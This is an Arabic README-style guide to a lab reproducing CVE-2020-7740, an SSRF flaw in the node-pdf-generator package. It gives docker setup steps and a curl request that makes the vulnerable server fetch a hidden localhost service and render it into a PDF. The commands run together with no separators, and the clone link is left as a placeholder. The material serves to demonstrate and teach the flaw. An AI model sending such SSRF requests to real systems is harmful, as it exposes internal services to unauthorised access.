
مثال على CVE-2020-7740
يؤثر هذا على جميع إصدارات الحزمة node-pdf-generator. بسبب نقص التحقق من صحة إدخال المستخدم وتنظيف المحتوى المقدم إلى node-pdf-generator، يمكن للمهاجم صياغة رابط يتم تمريره إلى خادم خارجي مما يسمح بهجوم SSRF.
docker build -t cve-2020-7740 .docker run -p 3000:3000 cve-2020-7740localhost:3001 مباشرةcurl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdftest.pdf لعرض موقع localhost الذي يُفترض أن يكون مخفيًا.git clone {سيتم إدراج الرابط}https://wkhtmltopdf.org/node .\NodePdfGeneratorServer، سيعمل الخادم على localhost:3000python3 -m pip install -r requirements.txtpython3 HiddenService، سيعمل الخادم على localhost:3001curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdfhttp://www.google.com في الملف test.pdf